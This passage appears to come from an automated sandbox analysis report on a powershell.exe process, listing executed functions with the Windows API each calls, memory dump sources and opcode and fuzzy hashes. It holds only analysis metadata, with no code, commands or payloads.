                                                        • Instruction Fuzzy Hash: AFD05E343016818FEB16CA1CD198F5977E8AF44700F0644ECBC008B6A6C3B5E880C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 3028 Parent PID: 2692 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01D5ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D5AD37
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 44dc45b7a9dc0334924f53a452f3f65c0120fb764fa653c87fb3bc00ce0ab92e
                                                        • Instruction ID: 4f01a1f5f1b894a096d6acdb0fe0d271b4f3d1d131b7c57f0abf03d5eb24e9a6
                                                        • Opcode Fuzzy Hash: 44dc45b7a9dc0334924f53a452f3f65c0120fb764fa653c87fb3bc00ce0ab92e
                                                        • Instruction Fuzzy Hash: E821BF765097809FEB238F29DC44B92BFF4EF06210F08859AED858B563D231A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D5AD37
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 7641ebce17161afddd028e652ccc244a7f6ed3e95ade2fe90eb87fcb6cd2732b
                                                        • Instruction ID: 3d5365de0f98d8f21633f560d67939e0a94a3a22714581af25befa28d5cb3425
                                                        • Opcode Fuzzy Hash: 7641ebce17161afddd028e652ccc244a7f6ed3e95ade2fe90eb87fcb6cd2732b
                                                        • Instruction Fuzzy Hash: 7B11A076500700DFEF61DF59D884B96FBE4EF08221F08C56AED898B622E731E414CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D5B329
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 207aaec2cdc5e927f146971f17a105b780db753f1123242b36ec56f5b0f06d5d
                                                        • Instruction ID: ebec5b53830a8ae07bd23d5e7917d0bdd6cf3096595a2d0886b6ee050dfaf463
                                                        • Opcode Fuzzy Hash: 207aaec2cdc5e927f146971f17a105b780db753f1123242b36ec56f5b0f06d5d
                                                        • Instruction Fuzzy Hash: 0911A072508380AFDB228F15DC45F52FFB4EF46220F09849AED844B663D275A818DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D5B329
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: e31fdfa9cdeb33ab73a916db55c00e7505cb62d03f749aa081ff76f4fedaa4cb
                                                        • Instruction ID: 98670894325b5cc3f33fe31f09579c3bea96cf6dc7a35e4bc436a75f84477009
                                                        • Opcode Fuzzy Hash: e31fdfa9cdeb33ab73a916db55c00e7505cb62d03f749aa081ff76f4fedaa4cb
                                                        • Instruction Fuzzy Hash: DF01A936400700DFEF618F09D889B62FBA0EF08721F08C09ADD891B626D276E418DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028201D0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: a4b9c83db9ac944d952367856782bade75dd308c68842f48bcae2bfd4d657727
                                                        • Instruction ID: 1021a05bf22d5452451479852ed5938d431898de4c6bd2f6863a1f070134584e
                                                        • Opcode Fuzzy Hash: a4b9c83db9ac944d952367856782bade75dd308c68842f48bcae2bfd4d657727
                                                        • Instruction Fuzzy Hash: 83314A7A50E3C08FE7138B759C65691BFB4AF53210F0E84DBD884CF1A3D6299849D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0282067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0282072D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 4805b6a8b4e09eb214f5a3def4893fe252b6f5dc6763621db5c6ef70aa34db36
                                                        • Instruction ID: c9a897c06f9ec41fa088422cfb22b7e5a1b7fa80f12b846855324c05bfd996d5
                                                        • Opcode Fuzzy Hash: 4805b6a8b4e09eb214f5a3def4893fe252b6f5dc6763621db5c6ef70aa34db36
                                                        • Instruction Fuzzy Hash: CB317075505380AFE722CF65CC45F52BFF8EF05210F09849EE988CB292D325A848CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02820DD6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 8ef9d4cf7a05f4d3eaa815ea374fb7f102f50145e742be509f9832d24855eb6f
                                                        • Instruction ID: 6267744e9a45bf36b6e193213092965dc53b46e6442ab75128febc3d23843ce4
                                                        • Opcode Fuzzy Hash: 8ef9d4cf7a05f4d3eaa815ea374fb7f102f50145e742be509f9832d24855eb6f
                                                        • Instruction Fuzzy Hash: 7B319A75509380AFE712CB25DC45B96BFE8DF06214F0444AAE948CF293D375A949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: cde6ca0f338349c83ab8cee5e3a461de2a83b587b15b8028d981287f40cd362e
                                                        • Instruction ID: 22dd897061edd089fdc25d6be38c0364bcfdb2abde34588be4160f70b8e42a1d
                                                        • Opcode Fuzzy Hash: cde6ca0f338349c83ab8cee5e3a461de2a83b587b15b8028d981287f40cd362e
                                                        • Instruction Fuzzy Hash: F8319572509384AFE712CB61DC55F96BFB8EF06210F0885DBF985DB193D225A908C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 47bc96955959286662d298eacf3d05c63794c3c1ccf728cc9285c87298766614
                                                        • Instruction ID: b1e8dff171f7cc840e29af62eff96de9d5bb4da68c210dc5d9d66f2b18db97a4
                                                        • Opcode Fuzzy Hash: 47bc96955959286662d298eacf3d05c63794c3c1ccf728cc9285c87298766614
                                                        • Instruction Fuzzy Hash: 1C21B6B2509380AFEB12CF24DC45B96BFB8EF06320F0885DBE985DB193D265A945C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0282109E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 7ec72548c3e38200f1598910a4ecd9ed11e5a4987fe50c2597e5838b71278611
                                                        • Instruction ID: fa758b6dcbc4c246315a4ddfd614dd5d7ea3c366f16542fbfdb1d9a03b5d8f49
                                                        • Opcode Fuzzy Hash: 7ec72548c3e38200f1598910a4ecd9ed11e5a4987fe50c2597e5838b71278611
                                                        • Instruction Fuzzy Hash: A3316F7650E3C06FD3138B358C55B56BFB4AF43610F1A81DBD8848F2A3D629A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 80808ca4450733e348917068c61509040a4855bb629f52683de14b4e2faeb4d1
                                                        • Instruction ID: 8a69d6aa75e22d5d36b1d5dba88179af5192d0e2a58bd0454362add9dab0d3a9
                                                        • Opcode Fuzzy Hash: 80808ca4450733e348917068c61509040a4855bb629f52683de14b4e2faeb4d1
                                                        • Instruction Fuzzy Hash: 7B219171505380AFEB22CB15CC45FA6BFA8EF46220F08849BE945DB152D664E908CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D5A23E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 4220bc93d29db6a5cae097f981740d2dfd4be86aa49f2f84345d9006d9c13ff0
                                                        • Instruction ID: 41dea47ff512303446c7054b978fd18b2c39c83280be8d7ccbbdcbc8a3ba6382
                                                        • Opcode Fuzzy Hash: 4220bc93d29db6a5cae097f981740d2dfd4be86aa49f2f84345d9006d9c13ff0
                                                        • Instruction Fuzzy Hash: 9121B27140D3C16FD312CB258C55B66BFB4EF43620F0981DBD8848F693D229A919CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 02820819
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 42d725782635bda918ae124bc537e145c5af7b7f775988d565d4947d036bb105
                                                        • Instruction ID: 883340d3a21b447b58c1908f67451a638d1a2ebf16aa06b44d0b2365c895599c
                                                        • Opcode Fuzzy Hash: 42d725782635bda918ae124bc537e145c5af7b7f775988d565d4947d036bb105
                                                        • Instruction Fuzzy Hash: EC21DA76408780AFE712CB159C45FA3BFA8EF46720F0981DBF9848F193D224A909C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02820502
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: ebc020dce0382eea5c538f55319f480cfe96a874e676c32123d1beb3e28fbbe6
                                                        • Instruction ID: c8972d5d876b60926c29fd08d929ff4eea635590bb117441041d97b6bc52bf20
                                                        • Opcode Fuzzy Hash: ebc020dce0382eea5c538f55319f480cfe96a874e676c32123d1beb3e28fbbe6
                                                        • Instruction Fuzzy Hash: 2421717640E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028206AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0282072D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 3070b9af83b15468e43eb63f337da5e26296cb75c10641bcbb136fd6d9191301
                                                        • Instruction ID: fa4f455537d85654956ec02cbe9e655fa558f837aaca9700ecc53b8922282466
                                                        • Opcode Fuzzy Hash: 3070b9af83b15468e43eb63f337da5e26296cb75c10641bcbb136fd6d9191301
                                                        • Instruction Fuzzy Hash: CB21AE79500304EFE721DF65CC85F66FBE8EF08610F04846AE989CB292D332E848CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 028208E5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 71fd63b025e5c3cfb89daea56f5b4a1011099ec9741354bd206165f114e091db
                                                        • Instruction ID: b0f034c660b35484621546c5b0aee9a124a3e11ce791bb4fa56fc8929244d169
                                                        • Opcode Fuzzy Hash: 71fd63b025e5c3cfb89daea56f5b4a1011099ec9741354bd206165f114e091db
                                                        • Instruction Fuzzy Hash: 5621B276409380AFE722CF10DC45F96FFB8EF16310F09849BE9849B153C225A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D5A94A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 38592aefff544c92816c6f7631e01eac85d88af63a5661f3e29d6c15baa5f21d
                                                        • Instruction ID: 4a94b8d422f75513d305f6cd8a530d2870d5d7c77d253b48db56ea3e7035b101
                                                        • Opcode Fuzzy Hash: 38592aefff544c92816c6f7631e01eac85d88af63a5661f3e29d6c15baa5f21d
                                                        • Instruction Fuzzy Hash: B6219575409780AFD3138B259C51B62BFB4EF87A10F0981DBE8848B653D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02820DD6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: f80294ac99c605ef4be9d263a42eed864090b4f313de703f071c003f96e12216
                                                        • Instruction ID: 5c75936494ba798146a626407f711099f4b087e20b6e53b2b526c93f46c61a85
                                                        • Opcode Fuzzy Hash: f80294ac99c605ef4be9d263a42eed864090b4f313de703f071c003f96e12216
                                                        • Instruction Fuzzy Hash: A421AEB9601204AFF720DF25CC85BA6FBD8EF04614F04856AEC48DB282D775F948CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 39c4d9104dffacd8d4b157e661100944a999e298c6fde4aa7e9687938d5c13a4
                                                        • Instruction ID: 6ce8d85ccc54e296428dd0ad4e48eee017b8f69f2715fed1747f162b7be2fb37
                                                        • Opcode Fuzzy Hash: 39c4d9104dffacd8d4b157e661100944a999e298c6fde4aa7e9687938d5c13a4
                                                        • Instruction Fuzzy Hash: 87119D72500304EFEB21CF55DC85FAAFBA8EF04720F14856BFD459A141D675E9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02820FB0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 9446751a34a7155a0f313dc784ce8c5422c7a5435e035b36f4c173685469079e
                                                        • Instruction ID: 9f9761000854effd6d22a9aa923294a9fcd7846a789089f5518839557c1dcd70
                                                        • Opcode Fuzzy Hash: 9446751a34a7155a0f313dc784ce8c5422c7a5435e035b36f4c173685469079e
                                                        • Instruction Fuzzy Hash: B6217C755093C49FDB12CB25CC55B92BFA4AF13214F0984DAD988CF693D2659448C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0282137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: ace1b8290c990ce4ac574f5ec9a9a39c5290001864eff1859f7ea1827da9d1cb
                                                        • Instruction ID: 4d8ce05f40183739cb464b15eca3b547cf41b047774947de1af1726565a6fd57
                                                        • Opcode Fuzzy Hash: ace1b8290c990ce4ac574f5ec9a9a39c5290001864eff1859f7ea1827da9d1cb
                                                        • Instruction Fuzzy Hash: 632192765043809FDB21CF25DC45B96FFF4EF06220F08849AED898B563D235A448DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 13fb8627f3df3918335cb54cb4fc4ca9e0104fd14574510eca13aa469ca6dae8
                                                        • Instruction ID: ecb34d9570e958baf8ef2c087cf0115499644bff0092c464146f37fdefedbd3c
                                                        • Opcode Fuzzy Hash: 13fb8627f3df3918335cb54cb4fc4ca9e0104fd14574510eca13aa469ca6dae8
                                                        • Instruction Fuzzy Hash: 2F117F75600700EFEB21CF19DC85FA6FBA8EF45660F14846AED45CB641D674E9048A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D5BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 7de717b9112e2d73b30eda402763178da270b52840c1c845c7a361740e34400e
                                                        • Instruction ID: 4a726120cd0ebeafa20626cf23c2a4508d25bc1d9e332364045f27f45068db5e
                                                        • Opcode Fuzzy Hash: 7de717b9112e2d73b30eda402763178da270b52840c1c845c7a361740e34400e
                                                        • Instruction Fuzzy Hash: E721A1765093C09FEB128F25DC55A92BFE4EF07220F0984DBDD858F263D264A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D5AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: fa7b452734c0d4c09fa40350b4bcdb675ee417d0e0cb0895cf666731df4b08ac
                                                        • Instruction ID: ec06d3cd03923e30859f5fa04bde2fc322e785c18d09dd27447a92d3b76ba30c
                                                        • Opcode Fuzzy Hash: fa7b452734c0d4c09fa40350b4bcdb675ee417d0e0cb0895cf666731df4b08ac
                                                        • Instruction Fuzzy Hash: 992172726053809FEB22CF29DC44B52BFE8EF56611F0885AAED49CB253E265E404CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028210D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02821148
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 629c565e4ef25642fb5fe57269c054229c3ae12ffc6dc6f8b80c749224fcc911
                                                        • Instruction ID: a4d972215771a41567e2cad6e574968e29e1488e224c6b89f5e49cd12e4f0b61
                                                        • Opcode Fuzzy Hash: 629c565e4ef25642fb5fe57269c054229c3ae12ffc6dc6f8b80c749224fcc911
                                                        • Instruction Fuzzy Hash: 41216D6540D3C0AFD7138B259C54A62BFB4EF57620F1980DBDC888F2A3D269A808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: c90e7e1c1d12bc7df6c0ede9acfa122e8875d50892dc741266337169fe039000
                                                        • Instruction ID: 82cde93bba6c26e0cd07fceea8b21d2614424f7794ab6b8feda85aa5111004b5
                                                        • Opcode Fuzzy Hash: c90e7e1c1d12bc7df6c0ede9acfa122e8875d50892dc741266337169fe039000
                                                        • Instruction Fuzzy Hash: 4111C172500304EFEB21DF59DC85BA6FBA8EF44720F14856AFD498B281D675E9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 028208E5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: c3cc4da66fd1c8848f18d878729c83e6b67c83d55e2841cc37af3b860a4db3fc
                                                        • Instruction ID: c544ef3f347b939c7b03b1ed18c064f7b2d45c21ac7e2ada75e446fb4a3b99da
                                                        • Opcode Fuzzy Hash: c3cc4da66fd1c8848f18d878729c83e6b67c83d55e2841cc37af3b860a4db3fc
                                                        • Instruction Fuzzy Hash: 4A11017A000304EFFB21CF50DC40FA6FBE8EF14721F04845AED499A641C271A548CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D5BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 8093a8c983cfa75d322ffeacf379b4e81432633ef0ae5cd9e7b14d63a044ab4c
                                                        • Instruction ID: e33004f590ca6bd2bcc5d3938a8e72a785395347e69a7ea47da5b8ebebca21e6
                                                        • Opcode Fuzzy Hash: 8093a8c983cfa75d322ffeacf379b4e81432633ef0ae5cd9e7b14d63a044ab4c
                                                        • Instruction Fuzzy Hash: 21116D72504384AFDB22CF65DC45B52FFF4EF19210F08849AED898B662D375E418DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028212D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0282132F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 59c0a9fff87c7d68663d80de992cab2f0182688d9f082b0e7919301590fe2066
                                                        • Instruction ID: c15a350b4a1af665965f8692f5a94ee1e5d2b4d1a5d090bd1fbe3bab106a72cb
                                                        • Opcode Fuzzy Hash: 59c0a9fff87c7d68663d80de992cab2f0182688d9f082b0e7919301590fe2066
                                                        • Instruction Fuzzy Hash: C511C4755043809FDB118F15DC49B96FFE4EF06220F0884EEED498B252D239A408CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
